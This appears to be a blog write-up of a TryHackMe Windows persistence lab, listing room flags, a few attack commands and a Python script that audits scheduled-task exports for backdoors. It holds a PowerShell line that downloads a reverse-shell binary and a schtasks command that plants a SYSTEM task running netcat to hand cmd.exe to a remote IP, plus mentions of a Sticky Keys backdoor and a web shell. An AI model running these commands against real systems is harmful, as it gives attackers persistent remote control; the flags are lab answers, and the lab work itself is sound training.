
It’s Thursday and we are persisting with the Windows Local Persistence room on THM!
This one is quite a long one... that’s what she said, and as you may have noticed, it has stretched over multiple blog posts, but we will keep going until it’s done!
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.125.150:8000/rev-svc.exe','payload.exe')"




Flag 7 – THM{SUSPICIOUS_SERVICES}






schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.11.125.150 4449" /ru SYSTEM



Flag 9 – THM{JUST_A_MATTER_OF_TIME}
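
From the defender's side, the task created above stands out in a task export: it runs as SYSTEM, repeats every minute, and its action hands cmd.exe and an IP address to a binary outside the Windows directories. The following is an added example (not from the room or from this post) that audits a `schtasks /query /fo csv /v` export for that combination; the sample rows are constructed and trimmed to four columns, and the `Repeat: Every` value format is an assumption.

```python
import csv
import io
import re

# Constructed sample: trimmed `schtasks /query /fo csv /v` export (real exports have more columns).
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Repeat: Every"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k","SYSTEM","Disabled"
"\THM-TaskBackdoor","c:\tools\nc64 -e cmd.exe 10.11.125.150 4449","SYSTEM","0 Hour(s), 1 Minute(s)"
"\BackupJob","C:\Program Files\Backup\run.exe --nightly","CORP\svc_backup","Disabled"
'''

SHELLS = re.compile(r"\b(cmd|powershell|pwsh)(\.exe)?\b", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
TRUSTED_DIRS = ("%windir%", "%systemroot%", r"c:\windows", r"c:\program files")


def repeat_minutes(value):
    """Convert 'H Hour(s), M Minute(s)' to minutes; None when the task does not repeat."""
    m = re.search(r"(\d+)\s*Hour\(s\),\s*(\d+)\s*Minute\(s\)", value)
    return int(m.group(1)) * 60 + int(m.group(2)) if m else None


def audit_tasks(csv_text, max_interval=5):
    """Return {task name: [reasons]} for SYSTEM tasks that trip two or more indicators."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row["Task To Run"]
        reasons = []
        mins = repeat_minutes(row["Repeat: Every"])
        if mins is not None and mins <= max_interval:
            reasons.append(f"repeats every {mins} min")
        if SHELLS.search(action):
            reasons.append("action invokes a command shell")
        if IPV4.search(action):
            reasons.append("action carries a literal IP address")
        if not action.strip('"').lower().startswith(TRUSTED_DIRS):
            reasons.append("binary outside Windows/Program Files")
        is_system = row["Run As User"].upper().endswith("SYSTEM")
        # A single indicator is common on healthy hosts; require two to cut noise.
        if is_system and len(reasons) >= 2:
            findings[row["TaskName"]] = reasons
    return findings


if __name__ == "__main__":
    for task, reasons in audit_tasks(SAMPLE_CSV).items():
        print(task, "->", "; ".join(reasons))
```
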










Flag 10 – THM{NO_NO_AFTER_YOU}


Flag 11 – THM{LET_ME_HOLD_THE_DOOR_FOR_YOU}




Flag 12 – THM{I_INSIST_GO_FIRST}



Flag 13 – THM{USER_TRIGGERED_PERSISTENCE_FTW}









Triggering Sticky Keys (SHIFT x 5) will spawn cmd.exe with SYSTEM-level access.

Flag 14 – THM{BREAKING_THROUGH_LOGIN}



Flag 15 – THM{THE_LOGIN_SCREEN_IS_MERELY_A_SUGGESTION}






http://10.10.48.191/shell.aspx


Flag 16 – THM{EZ_WEB_PERSISTENCE}




Flag 17 – THM{I_LIVE_IN_YOUR_DATABASE}


- Hexacorn – Windows Persistence
- PayloadsAllTheThings – Windows Persistence
- Oddvar Moe – Windows Persistence Through RunOnceEx
- PowerUpSQL



Until next time & don’t sleepwalk through life!
Goodbye
